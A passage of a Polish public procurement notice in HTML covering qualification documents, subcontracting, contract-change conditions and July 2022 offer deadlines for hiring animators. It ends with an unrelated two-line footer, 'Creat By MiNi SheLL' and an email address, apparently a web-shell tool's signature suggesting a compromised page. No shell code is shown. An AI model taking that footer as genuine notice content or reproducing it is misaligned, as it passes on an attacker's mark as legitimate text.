innego właściwego rejestru. <br/>9.1.4.2	Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał w ofercie dane umożliwiające dostęp do tych dokumentów.<br/>9.1.4.3	Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z ww. dokumentów, Wykonawca składa pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>9.1.4.4	Pkt 9.1.4.3. stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. <br/>9.1.4.5	Pkt 9.1.4.1. – 9.1.4.3. stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 Ustawy lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.2.4	Zdolności techniczne lub zawodowe;<br/>Wykonawca spełnia warunek, jeżeli wykaże, że dysponuje osobami o odpowiednich kwalifikacjach zawodowych, doświadczaniu i wykształceniu niezbędnym do wykonywania przedmiotu zamówienia tj.: <br/>- doświadczenie animatorów liczone w latach dotyczące zatrudnienia minimum na jednym z stanowisk: animator kultury, sportowo-rekreacyjny, animator społeczny – wymagany minimum 1 rok zatrudnienia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.3.1	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający żąda wskazania w ofercie, czy zamierza powierzyć wykonanie części zamówienia podwykonawcom i podania firm podwykonawców, jeżeli są już znani.<br/>7.3.2	W przypadku powierzenia realizacji zamówienia podwykonawcy, Wykonawca ponosi odpowiedzialność za działania i zaniechania takiego podmiotu jak za własne. <br/>7.3.3	Wykonawca zobowiązany jest do poinformowania Zamawiającego o wszelkich zmianach danych w trakcie realizacji zamówienia, a także do przekazania informacji na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację zamówienia. <br/>7.3.4	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie, spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający zastrzega możliwość zmiany Umowy w następującym zakresie:<br/>1)	terminu realizacji Umowy wynikającym ze zmiany harmonogramu realizacji projektu lub przedłużającej się procedury wyboru Wykonawcy w postępowaniu lub przedłużającej się procedury podpisywania Umowy; <br/>2)	w związku ze zmianą umowy o dofinasowanie projektu, w ramach którego realizowany jest Przedmiot Umowy, gdy zmiana polegać będzie na dostosowaniu treści Umowy do warunków wynikających ze zmiany umowy o dofinansowanie;<br/>3)	w związku ze zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy, gdzie zmiana będzie polegać będzie na dostosowaniu treści Umowy do zmienionych przepisów prawa, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>4)	gdy zaistnieją nowe, szczególne okoliczności, niezależne od Zamawiającego i Wykonawcy, uzasadniające zmiany terminów realizacji zadań, przy czym zmiany terminów mogą być dokonane tylko w zakresie wynikającym z tych okoliczności, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>5)	gdy zaistnieje siła wyższa mająca wpływ na realizację umowy, przy czym za siłę wyższą (w szczególności: powódź, pożar i inne klęski żywiołowe, pandemie i epidemie, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia), gdzie zmiana będzie polegać będzie na dostosowaniu treści <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca może złożyć ofertę jedynie przy użyciu miniPortalu, szyfrując ją a następnie przekazując za pośrednictwem ePUAP. Oferty złożone za pośrednictwem poczty elektronicznej zostaną odrzucone. Przed złożeniem oferty zaleca się zapoznanie z Instrukcją użytkownika dostępną pod adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-04 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com